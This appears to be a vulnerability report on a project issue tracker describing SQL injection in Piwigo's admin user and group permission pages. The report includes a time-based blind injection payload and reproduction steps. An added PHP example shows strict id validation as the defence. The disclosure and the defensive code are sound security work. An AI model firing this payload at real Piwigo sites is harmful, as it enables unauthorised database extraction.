Hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php.
1:
Request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 (need to have a private album),
then move the album from the right to the left.
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
2:
Same as the first: request /admin.php?page=user_perm&user_id=1 (need to have a private album),
then move the album from the right to the left.
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
plegall changed the title from "Piwigo v2.9.5 - SQL injection in admin/user_perm.php and admin/group_perm.php" to "SQL injection in user/group permissions manager" on Aug 12, 2019
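
An added example, not part of the original report and not Piwigo's own code: the reported payload contains no quote characters, so it is written for an unquoted numeric position in a query, where quote escaping changes nothing and only strict integer validation rejects it. The helper name `validate_id_list` and the sample ids are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not a Piwigo function): accept only a list of plain
// decimal ids and return them as integers, ready for an IN (...) clause or
// for bound parameters.
function validate_id_list($raw): array
{
    if (!is_array($raw)) {
        throw new InvalidArgumentException('expected an array of ids');
    }
    $ids = [];
    foreach ($raw as $value) {
        // \A and \z anchor the whole string; a bare '$' would also accept
        // a trailing newline.
        if (!is_string($value) || preg_match('/\A[1-9][0-9]{0,9}\z/', $value) !== 1) {
            throw new InvalidArgumentException('non-numeric id rejected');
        }
        $ids[] = (int) $value;
    }
    return $ids;
}

// Constructed sample input: the payload string quoted in the report.
$payload = '1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))';

// Escaping targets quote characters, and this payload contains none, so the
// escaped and raw strings are compared here to show escaping is no defence.
var_dump(addslashes($payload) === $payload);

// A plain (int) cast would silently truncate the payload to its leading
// digit instead of refusing the request; the cast result is shown for contrast.
var_dump((int) $payload);

// Well-formed ids pass and come back as integers.
var_dump(validate_id_list(['3', '12']));

// The payload mixed into the list makes the whole request fail closed.
try {
    validate_id_list(['3', $payload]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```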